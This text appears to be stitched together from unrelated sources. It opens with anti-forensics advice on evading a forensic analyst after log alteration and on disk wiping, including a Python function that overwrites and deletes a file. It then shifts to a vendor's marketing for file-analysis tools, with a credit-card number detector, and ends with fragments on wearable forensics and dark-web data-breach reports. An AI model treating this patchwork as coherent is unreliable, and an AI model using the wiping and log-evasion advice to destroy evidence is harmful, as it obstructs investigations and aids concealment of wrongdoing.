It's good to know that the first thing a forensic analyst will do, if
he suspects a log alteration, is to try to find as many alternative
sources as possible, both inside and outside of the analyzed system.
So it is good to pay attention to any replicated or redundant log files
(backups!).
Data deletion
If you want to irreversibly delete your data, you should consider the
adoption of this technique. When we delete a file in our system, the
space it formally occupied is in fact marked only as free. The content
of this space, however, remains available, and a forensics analyst
could still recover it. The technique known as “disk wiping” overwrites
this “space” with random data or with the same data for each sector of
disk, in such a way that the original data is no longer recoverable.
Generally, in order to counter the use of advanced techniques for file
recovery, multiple passes over each sector and specific overwriting
patterns are adopted.
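
A single-file version of this idea can be sketched in Python as below; note, as the comment says, that on SSDs and copy-on-write file systems overwriting in place does not guarantee the data is gone:

import os

def wipe_file(path, passes=3):
    """Overwrite a file in place before deleting it (a simplified sketch).
    Caution: on SSDs and journaling/copy-on-write file systems, wear
    levelling and block relocation mean overwriting may NOT destroy
    every copy of the data."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))   # large files should be chunked
            f.flush()
            os.fsync(f.fileno())
    os.remove(path)

wipe_file("sensitive.txt")  # hypothetical file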
Meta-data shredding
Physical destruction
It has been estimated that 80-90% of all business data is unstructured, and 80% of this is
never even retrieved again once it has served its purpose.
While eDRMS tools such as Content Manager allow you to structure your information
and manage it appropriately, we have seen a number of organisations still struggle to
contain all of their corporate information to a single managed system, which can then
introduce security, searchability and governance risks.
Users will be users, and if they can save information somewhere more convenient, they
will!
There is, however, a solution that does not require businesses to radically change the
way they do everything.
File analysis tools allow organisations to connect to multiple sets of different types of data,
understand exactly what they are holding, and action it. This includes file shares, emails,
archive systems, SharePoint, eDRMS and many more.
ControlPoint and Data Discovery, two leading file analysis products from Micro Focus,
have been used by WyldLynx both internally and extensively with a number of clients
over the past 5 years.
With very similar file analysis functionality, the main difference between the two
products is that ControlPoint runs as a locally installed product, whereas Data Discovery
is cloud-based. Click the links to learn more about these two powerful and helpful tools.
The introduction of these tools has allowed for a vast number of wins relating to legacy
data clean up and locating key data, including:
Identifying duplicates, trivial files, and information no longer required, as well as allowing
the clean-up of this information to create more space
Scouring repositories for key project/sensitive information and relocating it to the managed
information system
Responding to information requests with certainty that all information stores have been
assessed
Responding to potential security breaches with confidence that you know what is being
held
Actioning Commission of Inquiry or Royal Commission disposal freezes by locating and
placing a hold on in-scope information
Understanding the history and story of data growth, and analysing it based on a range of filters
Throughout these processes, we have seen both tangible and non-tangible benefits for
all of our analytics customers. Here are a few highlights from some of our experiences
with ControlPoint and Data Discovery on actual, real world business data:
This customer had 20 terabytes of unstructured data, of which 50%(!) was duplicated
across their environment. By de-duplicating the data they estimated a saving of $2.5
million over 5 years in storage alone.
The Federal and Queensland governments issued a disposal freeze on records relating to
vulnerable people. File analytics was used to locate information in scope, and then apply
a hold to these records so that they could not be deleted or edited until the disposal
freeze was lifted.
WyldLynx always reiterates to our customers that no matter what policies they have in
place for storing sensitive information (such as credit card details), users will be users
and may not actually consider the policy while in the process of doing their work. After
undertaking a pattern matching exercise across their data stores, we found that 1% of a
customer's unstructured (and unsecured) data contained text matching a credit
card number pattern. This allowed the customer to relocate and secure this information into
Content Manager with the correct security applied.
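
A pattern-matching exercise of this kind usually pairs a regular expression with the Luhn checksum to cut false positives. A minimal Python sketch:

import re

CARD = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_ok(number):
    """Return True if the digit string passes the Luhn checksum."""
    digits = [int(d) for d in number][::-1]
    total = sum(digits[0::2]) + sum(sum(divmod(2 * d, 10)) for d in digits[1::2])
    return total % 10 == 0

text = "invoice note: card 4111 1111 1111 1111, ref 1234567890123"
for m in CARD.finditer(text):
    digits = re.sub(r"[ -]", "", m.group())
    if luhn_ok(digits):
        print("Possible card number found:", digits[:6] + "******")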
Cloud migration
A customer needed to make sure they did not transfer their 'junk' from their on-premise
storage over to SharePoint during their cloud transition. They were able to relocate their
transient information (non-records) from the file system into an archive drive, and
relocate only what was relevant to the cloud (using time and content-based rules and
policies). The transient information was then due to be destroyed automatically after
two years of not being accessed.
As you can see there is a large range of use cases for file analytics, and the list is
continuing to grow.
The takeaway: Wearable devices like Fitbits monitor location via GPS
and activities like distance traveled, steps taken, sleep time and heart
rate. The devices are configured to synchronize data to applications
on smartphones and personal computers or to cloud or social media
sites. Evidentiary collections can be made from either of these
sources using standard digital forensics tools and techniques.
Case study three: Data from asset trackers – sensors and IoT devices
Details: 180 million Domino’s India pizza orders are up for sale on
the dark web, according to Alon Gal, CTO of cyber intelligence firm
Hudson Rock.
Gal found someone asking for 10 bitcoin (roughly $535,000 or ₹4
crore) for 13TB of data that they said included 1 million credit card
records and details of 180 million Domino's India pizza orders, topped
with customers' names, phone numbers, and email addresses. Gal
shared a screenshot showing that the hacker also claimed to have
details of Domino's India's 250 employees, including their
Outlook mail archives dating back to 2015.
The seller shared with CloudSEK a sample of the data dump containing the
information of 10,000 exam candidates. The information shared by
the company shows that the leaked information contained full
names, mobile numbers, email IDs, dates of birth, FIR records and
criminal history of the exam candidates.
The user data is up for sale on the dark web for around $5000,
according to independent cybersecurity researcher Rajshekhar
Rajaharia.
Details: User data from online grocery platform BigBasket is for sale
in an online cybercrime market, according to Atlanta-based cyber
intelligence firm Cyble.